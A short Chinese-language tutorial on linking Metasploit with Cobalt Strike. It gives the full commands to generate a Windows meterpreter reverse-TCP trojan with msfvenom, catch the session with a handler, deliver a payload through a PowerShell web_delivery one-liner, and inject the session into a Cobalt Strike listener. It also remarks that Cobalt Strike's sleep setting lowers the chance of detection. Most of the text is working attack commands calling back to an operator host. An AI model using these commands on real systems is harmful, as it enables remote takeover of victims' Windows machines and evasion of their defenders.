MSF与CS联动
MSF上线CS
1.MSF运行exe上线
先用msfvenom生成一个木马,这里是windows的木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.255.128 LPORT=6666 -f exe >/root/Payload/msf.exe
然后到主机中运行exe
msf监听得到session
use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lhost 192.168.255.128 set lport 6666 exploit
2.powershell上线
使用powershell上线MSF
使用的不是msf中exploit/multi/handler
模块,而是使用的exploit/multi/script/web_delivery
类
use exploit/multi/script/web_delivery set target 2 注意这里是 target 2 set payload windows/x64/meterpreter/reverse_tcp set lhost 192.168.255.128 set lport 6666 run
然后复制生成的powershell到windows主机中执行powershell
成功上线
启动cs
MSF上使用payload_inject模块
use exploit/windows/local/payload_inject 使用该模块可以将 Metasploit 获取到的会话注入到CS中 set DisablePayloadHandler true 用来禁用 Metasploit payload handler的监听 因为要监听到cs上 set lhost xxx CSIP set lport 7869 CS上的listen端口 set session 10 要转发的session
成功上线cs
在interact交互的时候执行命令返回很慢,是因为cs自带有sleep机制 这样可以减少被检测出的风险
可以通过sleep 1 调整休眠时间
然后再执行命令响应就很快了